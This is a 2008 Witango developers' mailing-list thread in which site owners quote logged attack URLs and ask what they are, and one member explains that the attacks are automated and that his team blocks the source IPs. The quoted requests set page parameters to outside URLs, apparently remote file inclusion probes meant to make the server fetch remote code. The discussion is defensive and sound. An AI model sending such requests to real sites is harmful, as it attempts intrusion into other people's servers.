RE: Witango-Talk: Curiuos

Wed, 19 Mar 2008 00:07:00 -0700 

Steve,
There have been quite a few url attacks recently. They automated the attacks by setting up http://...... as a url parameter, and they came about every hour under different IP addresses too. If your url uses the userreferencekey and they set userreferencekey=http://..... you will see the expiration of the key in the log. In our case, we have automated a process to block these IPs. 

MC

At 08:40 PM 3/18/2008, you wrote:

HI,


Just thought I would resurrect this thread. A few developers 
mentioned they are seeing the same thing. I was looking at a Witango 
log and discovered the following.



18/03/2008 22:22:04 
<mailto:[EMAIL PROTECTED]://www.insanechicken.com//phpMyAdmin/libraries/ludeme/gakacag/>[EMAIL PROTECTED]://www.insanechicken.com//phpMyAdmin/libraries/ludeme/gakacag/ 
0 [Expired] Variables for key 
<mailto:[EMAIL PROTECTED]://www.insanechicken.com//phpMyAdmin/libraries/ludeme/gakacag/>[EMAIL PROTECTED]://www.insanechicken.com//phpMyAdmin/libraries/ludeme/gakacag/



How are these guys creating a (I assume) userreferencekey equal to 
their url? Is this a problem?


Just curious. Maybe worried!

Steve Fogelson


----------
From: Fogelson, Steve [mailto:[EMAIL PROTECTED]
Sent: Thursday, February 28, 2008 9:44 AM
To: [email protected]
Subject: Witango-Talk: Curiuos

Hi,


Here is a sample of urls that are being submitted to some of my 
sites. They are reported as errors as I'm using Scott's error 
reporting routine.


<http://www.xxxxxx.com/Category/2lvl1lstbx.taf?Master_ID=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&cat=150>www.xxxxxx.com/Category/2lvl1lstbx.taf?Master_ID=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&cat=150

www.xxx.com/main.taf?Cat=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fjoomla%2Fmambots%2Fcontent%2Fugi%2Fvipo%2F&RD=1&_start=

<http://www.xxxx.com/custom.taf?cpage=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F>www.xxxx.com/custom.taf?cpage=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F


I checked the ip address and they are coming from Amsterdam. Does 
this look like possible "cross-scripting" attempts or some other 
"hack" on their part?



Some time back I had to resort to white-listing ip addresses on my 
ftp servers as brute force account and password attacks were 
originating from Amsterdam.


Thanks

Steve Fogelson


________________________________________________________________________
TO UNSUBSCRIBE: Go to http://www.witango.com/developer/maillist.taf


________________________________________________________________________
TO UNSUBSCRIBE: Go to http://www.witango.com/developer/maillist.taf


________________________________________________________________________
TO UNSUBSCRIBE: Go to http://www.witango.com/developer/maillist.taf





















					Reply via email to